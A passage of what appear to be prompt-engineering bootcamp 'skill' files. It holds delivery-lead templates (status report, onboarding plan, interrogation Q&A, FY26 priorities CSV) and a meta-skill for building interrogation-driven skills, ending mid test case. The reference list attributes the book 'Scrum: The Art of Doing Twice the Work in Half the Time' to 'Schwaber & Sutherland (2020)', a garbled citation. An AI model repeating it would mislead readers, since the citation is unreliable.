| Architecture Approval | Feb 15 | 🟢 On track | 100% | Steering approved Feb 14 |
| Platform Build Phase 1 | Mar 31 | 🟡 At risk | 65% | API delays pushing 1 week |
| Beta Testing | Apr 15 | 🟡 At risk | 20% | Waiting on client QA resources |
### 2. Key Achievements This Week
- ✅ Completed architecture review (all 14 stakeholder comments resolved)
- ✅ Hired contract QA resource (starts Monday)
- ✅ Client approved data migration approach
### 3. Risks & Escalations
**🔴 ESCALATION NEEDED**: Client API vendor delay pushing Phase 1 completion by 1 week
- **Impact**: Beta testing may slip from Apr 15 → Apr 22
- **Mitigation in progress**: Building contingency API wrapper (ETA Friday)
- **Escalation**: Requesting steering committee approval for 1-week schedule extension
### 4. Next Week's Plan
- [ ] Resolve final 3 architecture comments
- [ ] Begin platform build (Week 1 of 8)
- [ ] Schedule client data migration workshop
- [ ] Hire additional contract developer (capacity planning)
### 5. Client Asks / Open Items
| Ask | Owner | Status | Timeline |
|-----|-------|--------|----------|
| Training schedule for Phase 2 | [Client] | Pending | Due by Feb 28 |
| Technical resource for integration testing | [Client] | In progress | Starting Mar 1 |
| Approval for go-live cutover plan | [Client] | Not started | Need by Apr 1 |
```
### 4. Team Scaling Onboarding Plan
```markdown
## Onboarding Plan: [New Team Member Name]
### Phase 1: Week 1 - Foundation (Context Assembly)
**THINK**: What must they understand in first 7 days?
- Project mission, scope, success criteria
- Team structure and roles
- Client context and stakeholder map
- Delivery methodology and ceremonies
- Current phase and blockers
**ACT**: Day-by-day
| Day | Activity | Owner | Duration |
|-----|----------|-------|----------|
| 1 | Intro to project + org context | [DL] | 2h |
| 1 | Meet core team + role clarity | [PM] | 1h |
| 2 | Client context + stakeholder map | [Account exec] | 1.5h |
| 2 | Current phase deep-dive + blockers | [Tech lead] | 2h |
| 3 | Documentation review (project plan, ADRs, design docs) | Self-directed | 3h |
| 3 | Q&A with delivery team | [DL] | 1h |
| 4-5 | Shadow team ceremonies (standups, planning, client calls) | [Team] | 5h |
**OBSERVE**: Phase 1 checkpoint
- [ ] Can articulate project goal in 2 sentences
- [ ] Knows all core team members + roles
- [ ] Understands current phase and top 3 blockers
- [ ] Attended at least 3 ceremonies
### Phase 2: Week 2-3 - Ramp-Up (Role-Specific)
**Task**: [Role-specific onboarding based on their position]
### Phase 3: Week 4-6 - Contribution (First Real Task)
**Task**: Assigned first "real" task with mentor pairing
- Task has clear success criteria
- Mentor reviews work before integration
- Increases autonomy over time
### Knowledge Base Verification
```
- [ ] Reviewed Project Charter
- [ ] Read technical ADRs
- [ ] Understood team conventions (naming, code review, etc.)
- [ ] Knows escalation path for blockers
- [ ] Has access to all tools (Jira, docs, etc.)
- [ ] Can execute a task with mentor review
```
---
## Using the Skill: Step-by-Step Workflow
### Step 1: Choose Your Scenario
```
"I need to build FY26 priorities for Q1 and Q2"
→ Scenario A (Priority Building)
"I'm onboarding 3 new engineers and want to capture team knowledge"
→ Scenario B (Team Scaling)
"Time to report project health to the steering committee"
→ Scenario C (Status Reporting)
"Too many risks, need a systematic approach to identify and track them"
→ Scenario D (Risk Assessment)
```
### Step 2: Let the Skill Interrogate
The skill will ask 14-17 questions. **Answer fully** — this is where context richness happens.
Example interrogation flow:
```
Q1: Team composition?
A: 8 people - 1 DL (me), 1 PM, 4 engineers, 1 QA, 1 data analyst.
Remote across PST, CST, EST. No overlap between CST/EST and PST team.
Q2: Project budget?
A: $2.3M total contract, Q1-Q3 delivery. About $180K/month burn rate.
20% contingency = $460K left. Not burning through it yet.
Q3: Main deliverables?
A: (1) Data platform foundation, (2) Client portal, (3) Integration suite,
(4) Training program, (5) Go-live support
Q4: Success metrics?
A: Client tracks three things: time-to-insight (target < 2 min),
data freshness (< 1 hour), and adoption (target 80% of users in 90 days)
Q5: Delivery methodology?
A: Agile, 2-week sprints. Ceremonies: daily standup, sprint planning,
retrospectives, steering committee every 2 weeks
Q6: Current phase?
A: In detailed design (weeks 3-4 of 12-week delivery). Just completed
architecture review with client and internal stakeholders.
[... continues through all questions ...]
```
### Step 3: Review Generated Output
The skill will generate:
- ✅ Structured priorities in CSV (Scenario A)
- ✅ Onboarding plan + ADR template (Scenario B)
- ✅ Status report ready to send to client (Scenario C)
- ✅ Risk matrix with mitigation plans (Scenario D)
### Step 4: Execute with Confidence
Use the generated output as:
- **For priorities**: Load into your system or tracking system, share with team, measure against metrics
- **For onboarding**: Follow day-by-day plan, use checkpoints to verify ramp-up
- **For status**: Send to client/leadership with no edits (it's already structured)
- **For risks**: Monitor mitigation progress weekly, escalate if probability/impact changes
---
## Design Principles
### Principle 1: Context Over Guessing
**Never generate a strategy without understanding:**
- What problem are we solving?
- What are the hard constraints?
- What does the client really value?
- What could derail this?
The interrogation phase ensures we have rich context before any recommendations.
### Principle 2: Structure Over Narrative
**Always output:**
- Matrices and tables (not paragraphs)
- CSV export (not "here's a summary")
- Checklists (not suggestions)
- Metrics and owners (not vague goals)
Bootcamp intuition: Structure gets rewarded.
### Principle 3: Verification by Default
**Every strategy includes:**
- Why we're recommending it (THINK)
- The specific action (ACT)
- How to verify it's working (OBSERVE + metrics)
ReAct pattern enforces accountability.
### Principle 4: Organizational Awareness
**Always respect:**
- Client decision-making style
- Team capacity and skill gaps
- Portfolio and competing priorities
- Organizational change readiness
This is where interrogation pays dividends.
---
## Example: Complete Workflow
### Scenario: FY26 Priority Building for $2.3M Digital Transformation Project
**You say:**
```
I'm the Delivery Lead on a $2.3M digital transformation project for a financial services client.
I need to create FY26 priorities that align with our quarterly planning and map to ABCD.
The team is 8 people, we're in design phase, and I need to present this to steering next week.
```
**Skill interrogates (Phase 1: Team & Project Context):**
```
Q1: Team composition?
→ "8 people: 1 DL, 1 PM, 4 engineers, 1 QA, 1 analyst. Distributed PST/CST/EST."
Q2: Project budget?
→ "$2.3M total, $180K/month burn, 20% contingency remaining ($460K)."
Q3: Main deliverables?
→ "(1) Data platform foundation, (2) Client portal, (3) Integrations,
(4) Training, (5) Go-live support. 12-week timeline total."
Q4: Success metrics?
→ "Client cares about: time-to-insight < 2 min, data freshness < 1 hour,
adoption 80% in 90 days post-launch."
Q5: Delivery methodology?
→ "Agile, 2-week sprints. Daily standups, sprint planning, retros,
steering every 2 weeks."
Q6: Current phase?
→ "Week 3-4 of 12. Just completed architecture review. All stakeholders approved design."
```
**Skill interrogates (Phase 2: Client & Stakeholder Dynamics):**
```
Q7: Stakeholder map?
→ "Executive sponsor (SVP Finance), two program managers, three power users
from operations, one IT director. Sponsor is data-driven, PMs are collaborative,
power users are skeptical about change."
Q8: Relationship health?
→ "Good. Sponsor is engaged, PMs are responsive. Power users are worried about
adoption but participating actively."
Q9: Client technical resources?
→ "They have 1 dedicated technical person for reviews + integration testing.
OK but not deep."
Q10: Change management readiness?
→ "Medium. They've done one prior digital transformation (3 years ago, was painful).
Training budget approved. Need champions in each department."
```
**Skill interrogates (Phase 3: Risk & Dependencies):**
```
Q11: Top risks?
→ "(1) Their legacy system has data quality issues we're discovering late
(Q2 risk). (2) One critical engineer might leave in Q2 (personal situation).
(3) Adoption risk if training isn't top-notch."
Q12: Dependencies?
→ "Waiting on their data team for schema finalization (should be 2 weeks).
We handle everything else. No other workstreams blocking us."
Q13: Escalation paths?
→ "Steering committee every 2 weeks. Sponsor makes final calls.
Any schedule impact needs sponsor approval."
Q14: Resource constraints?
→ "We're not constrained (staffed fully for this phase). Client is the constraint.
Their power users will be busy with quarterly closing in late Feb."
```
**Skill interrogates (Phase 4: Organizational Context):**
```
Q15: Portfolio context?
→ "This is one of 3 concurrent projects for our practice. Others are not dependent.
This is the flagship project for the client relationship."
Q16: Org readiness for change?
→ "They've announced the initiative but haven't trained people yet.
We're responsible for training in Phase 3. Change management is light."
Q17: What should we know?
→ "The previous transformation failed on adoption. This client doesn't trust new systems.
User acceptance is the real risk, not technical delivery."
```
**Skill generates: FY26 Priorities CSV**
```csv
Priority,Action,Behavior,Context,Delivered,Owner,Timeline,Metrics,Notes
"Q1 Foundation: Data Platform Build","Engineer data ingestion pipeline, core analytics, reporting APIs","Code reviewed to team standards, 95% test coverage, all architecture ADRs documented, client schema finalized and validated","Unblocks all downstream work. Client has painful manual processes today. This is the 'why' for the project.","Production-ready data pipeline, ingesting 3 source systems, 50+ reports available","[Tech Lead]","Jan-Feb (9 weeks remaining)","Pipeline latency < 15min, data freshness < 1h, zero failed ingests over 2 weeks","Depends on client data team schema work. Schedule risk if slips. Mitigation: our team building interim schema."
"Q1 Foundation: Client Portal MVP","Build self-service client dashboard with role-based views, export capability, real-time KPI dashboards","Full end-to-end tested, accessibility compliant, 2 rounds of user feedback integrated, training materials drafted","Client power users will use this daily. Adoption depends on UX quality. This is proof-of-concept for the broader change.","Live portal with 5 core reports, 3 user roles, < 2s load time, 95% uptime","[PM + 2 eng]","Jan-Feb","Page load < 2s, adoption 40% by Feb 28, NPS > 7 from power user testing","Need user feedback loop starting week 4. Risk: poor UX adoption if not tested with real users early."
"Q1-Q2 Integration: Legacy System Connectors","Build adapters for 3 critical legacy systems, handle ETL complexity, document data mappings","All adapters unit tested, integration tested with production-like data, data reconciliation manual spot-checks 100% passed, runbooks written","Client has painful manual exports today. Automating these saves 200 hours/month. Quick wins build momentum.","All 3 adapters live and validated, automating 4 manual processes","[Data eng]","Feb-Mar (5 weeks)","Zero manual data entry errors, 200+ hours/month automation, audit trail complete","Data quality issues emerging (legacy system has ~10% bad records). Mitigation: data cleansing ADR and strategy by week 5."
"Q2 Adoption: Training Program & Change Management","Develop train-the-trainer program, facilitate dept-specific training, identify and empower champions in each area","Train-the-trainer pilot with 3 power users, training materials > 90% positive feedback, at least 1 champion per department trained and ready","The previous transformation failed on adoption. This is existential risk. Real focus here. Need user buy-in.","100% of target users trained, 3+ champions active per department, readiness assessment passed","[PM + 2 trainers]","Feb-Mar (launching Mar 1)","Training completion 90%, champion engagement > 80%, user readiness survey >= 7/10","Schedule: can't start until portal is stable (end of Feb). Mitigation: dry-run materials now with team."
"Q3 Delivery: Go-Live & Post-Launch Support","Orchestrate cutover, monitor production launch for 30 days, handle day-1 issues, measure business impact","All runbooks tested in staging, incidents < 2h resolution, support team briefed and on standby, success metrics dashboard live","This is the finish line. Quality here determines relationship health. Need flawless execution.","Live system, 90%+ adoption in 30 days, business metrics improving (time-to-insight target met)","[DL + full team]","Mar (launches week 12)","Uptime 99.9%, incident resolution < 2h, NPS post-launch >= 8, adoption 80% by week 4","Risk: if training didn't land, adoption will be low. Mitigation: have support team ready with 24/7 coverage week 1."
```
**Skill generates: Strategic Context for Steering**
```
## FY26 Narrative for Steering Committee
### Program Health
🟢 **GREEN** — On track for Q1 foundation, Q2 adoption, Q3 launch.
### Why These Priorities?
**Sequencing is critical:**
1. **Q1 Foundation** (8 weeks): Build platform + portal. This is the hardest technical work. Must finish before clients use it.
2. **Q2 Adoption** (4 weeks): Train, empower champions, build trust. This is the real risk. Previous transform failed here.
3. **Q3 Launch** (4 weeks): Go-live with full team support. Measure impact.
### Biggest Risks & Mitigations
| Risk | Mitigation | Owner |
|------|-----------|-------|
| Data quality issues in legacy system | Data cleansing strategy by Feb, staged ingestion | Tech lead |
| Key engineer departure in Q2 | Document critical knowledge now, hire contractor backup | DL |
| Adoption fails (like last time) | Invest heavily in training + champions, measure readiness | PM |
| Client power users not engaged | Early UX testing with real users, feedback loop | PM |
### What We Need From Client
- [ ] Data team schema finalization (by Feb 1)
- [ ] 1 dedicated technical resource for integration testing
- [ ] Commitment to 3+ champions per department for training
- [ ] Go-live cutover plan approval by Mar 15
```
**Skill generates: Verification Checklist**
```markdown
## FY26 Execution Checklist
### Q1 Foundation (Weeks 1-8)
- [ ] Architecture approved by steering (done)
- [ ] Data pipeline ingesting all 3 sources
- [ ] Portal MVP live with 5 core reports
- [ ] User feedback collected and integrated
- [ ] Training materials drafted and ready
- [ ] Integration roadmap for 3 legacy systems finalized
### Q2 Adoption (Weeks 9-12)
- [ ] Train-the-trainer pilot with power users
- [ ] Department-specific training sessions scheduled
- [ ] Champions identified and briefed
- [ ] Readiness survey shows >= 7/10
- [ ] Legacy system integrations live and tested
### Q3 Launch (Weeks 13-16)
- [ ] Go-live cutover plan approved
- [ ] Support team on standby (24/7)
- [ ] Business metrics dashboard live
- [ ] Day-1 incidents resolved < 2 hours
- [ ] Post-launch NPS >= 8
### Health Metrics to Track Weekly
- [ ] Story velocity on track
- [ ] Defect backlog < 20
- [ ] Client satisfaction (steering feedback)
- [ ] Team capacity (no burnout)
- [ ] Risk register (top 5 risks monitored)
```
---
## Advanced Usage: Combining with Bootcamp Patterns
### Using with Spec-Driven Development
Create specs for each priority before implementation:
```
Scenario A → CSV priorities
+ Spec-driven dev → One-page spec per priority
+ ReAct planning → Implementation phases with THINK/ACT/OBSERVE
```
### Using with Persona Patterns
Different roles, different perspectives:
```
Career Coach Persona: "Here's how this builds your career narrative"
Delivery Expert Persona: "Here's how to execute flawlessly"
Client Advocate Persona: "Here's why this matters to the business"
```
### Using with Few-Shot Learning
Learn from past projects:
```
Previous project: $1.8M, 10 weeks, 95% on-time
This project: $2.3M, 12 weeks, similar team size
Pattern: Adoption was bottleneck last time
Recommendation: Front-load Q2 adoption work
```
---
## When to Use This Skill vs. Email/Meetings
| Task | Use Email/Meetings | Use Skill |
|------|-------------------|-----------|
| Update team on daily status | ✅ Standup | ❌ Overkill |
| Quick schedule change | ✅ Slack | ❌ Overkill |
| **Build FY26 priorities** | ❌ Messy | ✅ **This skill** |
| **Assess delivery risks systematically** | ❌ Missed items | ✅ **This skill** |
| **Create status report for steering** | ❌ Takes 2 hours | ✅ **This skill** |
| **Onboard new team member** | ❌ Inconsistent | ✅ **This skill** |
| **Build team knowledge base** | ❌ Nobody maintains it | ✅ **This skill** |
| **Present client situation analysis** | ❌ Just your gut | ✅ **This skill** |
---
## Bootcamp Integration
### For Facilitators
Use this skill in **Session 3: Delivery Patterns** when discussing:
- ReAct pattern for delivery decisions
- Real-world delivery scenarios
- Systematic problem-solving for leadership
### For Participants (Role-Fork Exercise)
**Use this skill when:**
- You're the "Delivery Lead" in a role-fork scenario
- You need to create priorities or status reports
- You're building team knowledge or onboarding people
- You're systematically assessing risks
**Expected outcome:**
- Understand how structured interrogation builds strategic context
- See ReAct pattern in action with delivery decisions
- Generate production-ready priorities/reports that impress stakeholders
---
## FAQ
**Q: Will this skill make all my delivery decisions for me?**
A: No. It structures your thinking and generates output. You make the final calls based on organizational context it can't know.
**Q: What if I'm not sure about the answers to interrogation questions?**
A: That's useful signal! It means you need to gather that context. The skill will help you identify what you're missing.
**Q: How is this different from just asking an LLM for advice?**
A: The interrogation phase ensures the recommendations fit YOUR project, client, and team — not a generic best practice that doesn't apply.
**Q: Can I use this for different delivery methodologies?**
A: Yes. Tell the skill your methodology (Agile, waterfall, hybrid, Scrum, Kanban, etc.) in Phase 1, and it adapts.
**Q: What if my client doesn't fit the patterns in this skill?**
A: Tell it during interrogation: "Our client makes decisions by consensus, very slow." It will adjust the risk assessment and recommendations.
**Q: I don't have time for a full interrogation. Can we skip questions?**
A: You could, but interrogation is where the value happens. Even 5 minutes answering key questions beats 30 minutes guessing.
**Q: Can I use this for a subcontractor or partner delivery?**
A: Yes. The framework applies to any delivery context. Just adjust the stakeholder map in Phase 2 interrogation.
---
## Real Example Outputs
### Output 1: FY26 Priorities CSV (Ready to Load into your system)
```
Priority,Action,Behavior,Context,Delivered,Owner,Timeline,Metrics
"Platform Foundation","Engineer core data pipeline","95% test coverage, architecture reviewed, client schema approved","Unblocks Q2 work, client has painful manual processes","Production-ready ingestion for 3 systems","[Tech Lead]","Jan-Feb","Latency <15min, uptime 99.9%"
```
### Output 2: Risk Matrix (Ready to Share with Steering)
```
| Risk | Probability | Impact | Mitigation | Owner | Status |
|------|-------------|--------|-----------|-------|--------|
| Data quality issues | High | High | Cleansing strategy by Feb 1 | [Name] | In progress |
| Key engineer leaves | Medium | High | Document knowledge, hire backup | [Name] | Monitoring |
| Adoption fails | Medium | Critical | Champions + training focus | [PM] | Active |
```
### Output 3: Status Report (Ready to Send to Client)
```
## Weekly Status Report
**Project**: Digital Transformation
**Overall Status**: 🟢 GREEN
**Milestone Progress**: [Table showing on-time delivery]
**Escalations**: [List of items needing client action]
**Next Week**: [Specific, actionable plan]
```
---
## References
- **ReAct Pattern**: Yao et al. (2022) "ReAct: Synergizing Reasoning and Acting in Language Models"
- **Persona Pattern**: White et al. (2023) "A Prompt Pattern Catalog to Enhance Prompt Engineering"
- **Few-shot Learning**: Brown et al. (2020) "Language Models are Few-Shot Learners"
- **Delivery Leadership**: Schwaber & Sutherland (2020) "Scrum: The Art of Doing Twice the Work in Half the Time"
- **Risk Management**: PMBOK Guide (2021) Project Management Institute
---
**Version**: 1.0
**Last Updated**: 2026-03-18
**For**: Joey's Prompt Engineering Bootcamp v2 — Delivery Lead Track
---
# skills-make-skills.md
# https://jrlopez.dev/p/skills-make-skills.md
---
name: make-skills
description: Meta-skill capstone — build your own interrogation-driven AI skill for any repeated task
version: 1.0
---
# Make-Skills Meta-Skill (Capstone)
## Overview
The **Make-Skills** skill is the capstone of Joey's Prompt Engineering Bootcamp v2. It's the moment when participants stop USING skills and start CREATING them.
This skill answers the fundamental question: **"How do you turn your repeated work into a skill that scales?"**
Using three interrogation phases, you'll discover the pattern hidden in your weekly tasks, extract it into a structured skill, and generate a production-ready skill file that you can save and use immediately.
The skill demonstrates all three bootcamp intuitions at the **meta level**:
1. **Context is everything** → The interrogation gathers rich context about YOUR task, YOUR constraints, YOUR audience
2. **Structure gets rewarded** → The output is a properly formatted skill file that an AI (or you) can read and execute
3. **You are the retrieval system** → The skill you build BECOMES a retrieval system for that task — it asks the right questions and assembles answers into structured context
---
## The Capstone Reveal
After you generate your first skill, the skill includes a **reflection section** that shows you what you just built:
> Look at what you just created:
>
> - It **ASKS questions** → that's retrieval (gathering relevant context)
> - It **ASSEMBLES your answers into structured context** → that's augmentation (organizing information)
> - It **FEEDS that context to the AI for generation** → that's generation (producing the output)
>
> **You just built a RAG system.** Every skill is a RAG system.
>
> The AI completing patterns from your context? That's what an LLM does. Why does structured input work better? The model was trained by humans who rewarded that — that's RLHF. You've been doing all three intuitions since the first exercise of the prereq.
---
## Key Capabilities
### 1. Task Discovery Phase
Finds the repeated, valuable work you do weekly and turns it into a skill-able task:
- **Identification**: What task do you repeat at least weekly?
- **Walkthrough**: How do you do it today, step by step?
- **Context Gathering**: What information do you need before you start?
- **Quality Criteria**: What does good output look like? Bad output?
- **Audience**: Who uses what you create?
### 2. Pattern Extraction Phase
Discovers the underlying pattern in your task and maps it to a skill framework:
- **Category Mapping**: Code generation? Document creation? Analysis? Communication? Planning?
- **Context Requirements**: What does this skill always need to know?
- **Question Design**: What should the skill ask the user before generating?
- **Output Structure**: What template ensures consistent, high-quality output?
### 3. Skill Generation Phase
Assembles your answers into a production-ready skill file:
- **SKILL.md Generation**: Properly formatted markdown with metadata, interrogation questions, output specifications
- **Example Interrogation**: A complete worked example showing the skill in action
- **Generated Example Output**: Sample output that participants can reference
- **Integration Notes**: How this skill connects to bootcamp patterns (RAG, ReAct, etc.)
---
## Usage Scenarios
### Scenario A: Repeatable Document Creation
*Sales decks, RFP responses, project briefs, technical specs*
**When to use**: "I create [documents] at least weekly. Each one is different, but the process is the same."
**What you'll get**: A skill that interviews you about the document's purpose, audience, and context — then generates a properly structured template with all sections filled in.
### Scenario B: Code Generation or Migration
*New microservice scaffolding, API contract implementation, database migration planning*
**When to use**: "I build [code structures] repeatedly, always following the same patterns."
**What you'll get**: A skill that asks about your codebase, conventions, and constraints — then generates implementation plans or code stubs with your team's exact patterns.
### Scenario C: Analysis or Decision Support
*Technical architecture reviews, competitive analysis, feasibility assessments, incident post-mortems*
**When to use**: "I analyze [situations] and always produce similar-structured recommendations."
**What you'll get**: A skill that gathers context about the situation — then generates structured analysis with evaluation frameworks and recommendation matrices.
### Scenario D: Communication or Planning
*Meeting agendas, status reports, project proposals, email templates*
**When to use**: "I create [communications] regularly and want them to be more consistent."
**What you'll get**: A skill that asks about the message, audience, and context — then generates well-structured communications with the right tone and completeness.
---
## 3-Phase Workflow
### Phase 1: Task Discovery (15 min)
The skill interrogates you to understand your repeated work:
```
Q1: "What task do you repeat at least weekly at work?"
→ Example: "I create test plans for new features"
Q2: "Walk me through how you do it today, step by step."
→ Step 1: Review feature specification
→ Step 2: Identify test scenarios (happy path, edge cases, error cases)
→ Step 3: Write test cases for each scenario
→ Step 4: Document expected outcomes
→ Step 5: Review with development team
Q3: "What information do you need to gather before you start?"
→ Feature spec, API contracts, existing test data,
→ Known limitations, browser/OS requirements,
→ Performance requirements, security considerations
Q4: "What does GOOD output look like? Bad output?"
→ GOOD: Clear test cases, comprehensive scenarios,
→ prioritized by risk, reproducible steps
→ BAD: Vague scenarios, missing edge cases,
→ unclear expected outcomes, untestable
Q5: "Who is the audience for your output?"
→ Development team reads it to understand testing
→ QA team executes it
→ Project manager uses it to track testing progress
```
### Phase 2: Pattern Extraction (10 min)
The skill identifies the underlying pattern and asks how to structure it:
```
Q6: "Which category best describes your task?
• Code generation (scaffolding, migrations, implementations)
• Document creation (decks, specs, proposals, briefs)
• Analysis/decision (reviews, assessments, comparisons)
• Communication (emails, reports, announcements)
• Planning (agendas, roadmaps, schedules)"
→ Category: "Document creation"
(test plan is a structured document with specific sections)
Q7: "What context does the skill always need to know?
List 5-7 pieces of information that change every time but are always needed."
→ Feature specification, testing scope,
→ Team's testing standards, environment constraints,
→ Performance/security requirements, timeline,
→ Success criteria for testing
Q8: "What questions should the skill ask the user
before generating the output?
(Think: what do you always ask when someone
hands you a feature to test?)"
→ What's the feature being tested?
→ What are the main user flows?
→ What edge cases matter most?
→ What's the timeline for testing?
→ What environments are available?
Q9: "What structure should the output follow?
Describe section headings, ordering, format details."
→ ## Test Objectives
→ ## Scope (in-scope, out-of-scope)
→ ## Test Scenarios (matrix: happy path, edge cases, errors)
→ ## Test Cases (step-by-step for each scenario)
→ ## Success Criteria
→ ## Known Limitations
```
### Phase 3: Skill Generation (automatic)
The skill assembles your answers into a complete, formatted skill file:
```markdown
---
name: [generated from your task]
description: [generated from your answers]
version: 1.0
---
# [Your Skill Name]
## Overview
[Generated explanation of what this skill does]
## Key Capabilities
[Generated from Phase 2 answers]
## Usage Scenarios
[Generated categories where this skill applies]
## Structured Interrogation Framework
### Phase 1: [Context gathering]
[Your questions, adapted and refined]
### Phase 2: [Structure definition]
[Your output structure requirements]
## Output Format Specification
[Your template with examples]
## Example: Complete Workflow
[Worked example showing interrogation → output]
## Reflection: What You Just Built
[The RAG explanation]
```
---
## Structured Interrogation Framework
### Phase 1: Task Discovery (5-7 questions)
1. **Weekly Task**: What task do you repeat at least weekly?
2. **Current Process**: Walk me through your steps today (step-by-step)
3. **Input Requirements**: What information do you need before starting?
4. **Quality Definition**: What's GOOD output? What's BAD?
5. **Audience**: Who uses your output? How?
### Phase 2: Pattern Extraction (3-4 questions)
6. **Task Category**: Code generation, document creation, analysis, communication, or planning?
7. **Context Requirements**: What 5-7 pieces of information always change but are always needed?
8. **Question Design**: What questions should the skill ask to gather that context?
9. **Output Structure**: What sections, ordering, and format for the output?
### Phase 3: Skill Assembly (automatic)
10. **Formatting**: Converts your answers into proper skill YAML/markdown
11. **Example Generation**: Creates a worked example showing interrogation → output
12. **Integration Notes**: Explains how the skill connects to RAG, ReAct, bootcamp patterns
---
## Output Format Specification
### Generated Skill Structure
```yaml
---
name: [Your-Task-Name]
description: [Your task interrogation-driven skill]
version: 1.0
---
# [Your Skill Name]
## Overview
[Purpose, target audience, core value]
## Key Capabilities
[What this skill does, derived from Phase 2 answers]
## Structured Interrogation Framework
### Context Assembly Questions
[Your questions, formatted as phase blocks]
## Output Format Specification
[Your output template with sections]
## Example: Complete Workflow
### Interrogation Phase
[Worked example of Q&A]
### Generated Output
[Sample output your skill would produce]
## Reflection: What You Built
[Explanation of RAG system structure]
```
---
## Example: Complete Workflow
### Scenario: QA Lead Building a "Test Plan Generation" Skill
**You say:**
```
I'm a QA Lead and I create test plans every week.
I want a skill that helps me generate them faster
and more consistently.
```
---
### Phase 1: Task Discovery
**Skill interrogates:**
```
Q1: What task do you repeat at least weekly?
→ "Creating test plans for new features.
I do this every sprint, sometimes 2-3 plans per week."
Q2: Walk me through how you do it today, step by step.
→ "Step 1: Read the feature specification
Step 2: Identify main user flows and happy paths
Step 3: List edge cases and error scenarios
Step 4: Define test cases (pre-conditions, steps, expected results)
Step 5: Estimate effort for each test case
Step 6: Create test data requirements
Step 7: Review with dev team to confirm scope
Step 8: Document known limitations
Step 9: Get stakeholder sign-off on scope"
Q3: What information do you need to gather before you start?
→ "Feature specification document
API contracts (if applicable)
User personas and use cases
Browser/platform requirements
Performance or load requirements
Security requirements
Existing test data and test environments
Team's testing standards (what counts as 'thorough')"
Q4: What does GOOD output look like? Bad output?
→ "GOOD:
- Clear objectives aligned to feature goals
- Comprehensive scenarios (happy path + edge cases + errors)
- Test cases with reproducible steps
- Clear expected outcomes
- Test cases prioritized by risk
- Known limitations documented
- Can be executed by any QA person
BAD:
- Vague test scenarios ('test the feature')
- Missing edge cases
- Unclear expected outcomes
- No priority or risk indication
- Can't be executed without asking author
- Covers only happy path"
Q5: Who is the audience for your output?
→ "Primary: My QA team (5 people) who execute the tests
Secondary: Development team (needs to understand test scope)
Tertiary: Project manager (tracks testing progress)"
```
---
### Phase 2: Pattern Extraction
**Skill interrogates:**
```
Q6: Which category best describes your task?
→ "Document creation — test plans are structured
technical documents with specific sections"
Q7: What context does the skill always need to know?
→ "1. Feature specification (what are we testing?)
2. Testing scope boundaries (in/out of scope)
3. User flows and personas
4. Platform/environment constraints
5. Performance or security requirements
6. Available test data and test environments
7. Team's testing standards"
Q8: What questions should the skill ask the user?
→ "When I get a feature to test, I always ask:
- What's the core feature we're testing?
- What are the main user flows?
- What edge cases are most important?
- What error scenarios matter?
- What's the timeline for testing?
- What environments do we have?
- What's known about performance/security needs?
- Are there similar features we can reference?"
Q9: What structure should the output follow?
→ "## Test Plan: [Feature Name]
### Test Objectives
- What we're validating
### Scope
- In-scope test areas
- Out-of-scope (explicitly)
### Test Scenarios
(Matrix table: Feature area | Happy Path | Edge Cases | Error Cases)
### Test Cases
For each scenario:
- Pre-conditions
- Step 1, 2, 3... (reproducible)
- Expected outcome
- Priority (P0, P1, P2)
### Test Data Requirements
- What data do we need?
### Success Criteria
- What does passing look like?
### Known Limitations
- What can't we test?
### Sign-Off
- Stakeholders agree to scope"
```
---
### Phase 3: Skill Generation
**The skill generates a complete SKILL.md file:**
```markdown
---
name: test-plan-generator
description: Create comprehensive test plans for new features using interrogation-driven scope definition
version: 1.0
---
# Test Plan Generator Skill
## Overview
The **Test Plan Generator** helps QA leads and testers create comprehensive,
well-scoped test plans for new features. Instead of starting from a blank page,
the skill interrogates you about the feature, generates a structured test plan,
and ensures nothing is missed.
This skill demonstrates all three bootcamp intuitions:
1. **Context is everything** — Before generating a test plan, it asks about
the feature, constraints, audience, and testing standards
2. **Structure gets rewarded** — Output is a properly formatted test plan with
clear sections, test scenarios, and success criteria
3. **You are the retrieval system** — The skill asks the questions YOUR team
always asks, capturing your testing expertise
## Key Capabilities
- **Feature Context Gathering**: Understand feature specifications, user flows, edge cases
- **Scope Definition**: Explicit in-scope and out-of-scope boundaries
- **Test Scenario Generation**: Happy path, edge cases, error scenarios in a matrix
- **Test Case Creation**: Step-by-step reproducible test cases with expected outcomes
- **Effort Estimation**: Risk-based prioritization (P0, P1, P2)
- **Stakeholder Alignment**: Built-in sign-off and known limitations
## Structured Interrogation Framework
### Phase 1: Feature Context (5 questions)
1. **Feature Name & Purpose**: What feature are you testing?
2. **User Flows**: What are the main user journeys through this feature?
3. **Edge Cases**: What edge cases matter most for this feature?
4. **Constraints**: What environment, platform, or performance constraints exist?
5. **Scope Boundaries**: What's explicitly OUT of scope?
### Phase 2: Test Strategy (4 questions)
6. **Test Objectives**: What are you validating? (Functionality? Performance? Security?)
7. **Test Scenarios**: What scenarios do you need to cover?
- [ ] Happy path
- [ ] Edge cases
- [ ] Error handling
- [ ] Performance/load
- [ ] Security (if applicable)
8. **Test Data**: What test data do you need?
9. **Success Criteria**: How will you know the feature works?
## Output Format Specification
```markdown
# Test Plan: [Feature Name]
## Test Objectives
- Validate [core functionality]
- Ensure [user flow] works correctly
- Confirm [error handling] behavior
## Scope
### In-Scope
- [ ] User registration flow
- [ ] Login functionality
- [ ] Password reset
- [ ] User profile updates
### Out-of-Scope
- [ ] Advanced analytics
- [ ] Historical data migration
- [ ] Internationalization (phase 2)
## Test Scenarios
| Feature Area | Happy Path | Edge Cases | Error Cases |
|--------------|-----------|-----------|-------------|
| Registration | Valid email, new user | Existing email, special chars | Invalid email format |
| Login | Valid credentials | Case sensitivity, spaces | Wrong password, locked account |
| Reset Password | Email exists | Email case variations | Email not found |
## Test Cases
### Scenario: User Registration (Happy Path)
**Test Case 1.1: Register with valid email**
- Pre-condition: User has never registered
- Steps:
1. Navigate to registration page
2. Enter email: test@example.com
3. Enter password: ValidPass123!
4. Click "Register"
- Expected: Account created, redirected to dashboard
**Test Case 1.2: Validate email format**
- Pre-condition: Registration page open
- Steps:
1. Enter email: not-an-email
2. Click "Register"
- Expected: Error message: "Please enter a valid email"
### Scenario: Login (Happy Path)
**Test Case 2.1: Login with correct credentials**
- Pre-condition: Account exists with email test@example.com, password ValidPass123!
- Steps:
1. Navigate to login page
2. Enter email: test@example.com
3. Enter password: ValidPass123!
4. Click "Login"
- Expected: Redirected to dashboard, session created, name displayed
**Test Case 2.2: Login with wrong password**
- Pre-condition: Account exists, user not logged in
- Steps:
1. Enter email: test@example.com
2. Enter password: WrongPass123!
3. Click "Login"
